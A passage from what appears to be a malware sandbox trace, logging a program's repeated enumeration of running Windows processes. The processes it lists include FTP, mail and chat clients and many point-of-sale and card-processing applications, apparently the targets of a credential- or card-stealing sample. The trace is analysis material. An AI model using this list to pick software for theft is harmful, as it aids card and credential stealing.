th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0279.876] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0279.878] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0279.879] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0279.881] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0279.883] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0279.884] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0279.886] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0279.888] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0279.889] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0279.891] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0279.893] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0279.894] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0279.896] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0279.897] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0279.899] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0279.901] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0279.952] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0279.955] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0279.957] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0279.960] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0279.962] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0279.964] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0279.966] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0279.968] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0279.970] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0279.972] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0279.974] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0279.976] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0279.978] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0279.981] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0279.983] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0279.985] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0279.987] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0279.989] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0279.991] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0279.993] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0279.995] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0280.039] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0280.041] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0280.043] CloseHandle (hObject=0x2134) returned 1 [0280.043] Sleep (dwMilliseconds=0x64) [0280.159] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0280.169] Process32First (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.170] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0280.172] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0280.173] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0280.175] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0280.176] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0280.177] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0280.179] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0280.180] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0280.182] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.183] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.185] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0280.186] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.188] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.189] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.191] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.192] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.193] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.195] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.196] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0280.198] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0280.216] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0280.217] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.219] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0280.220] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0280.222] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0280.223] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0280.225] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.226] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0280.228] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0280.229] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0280.231] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0280.232] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0280.233] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0280.235] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0280.236] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0280.238] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0280.239] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0280.240] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0280.242] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0280.243] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0280.245] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0280.247] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0280.249] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, 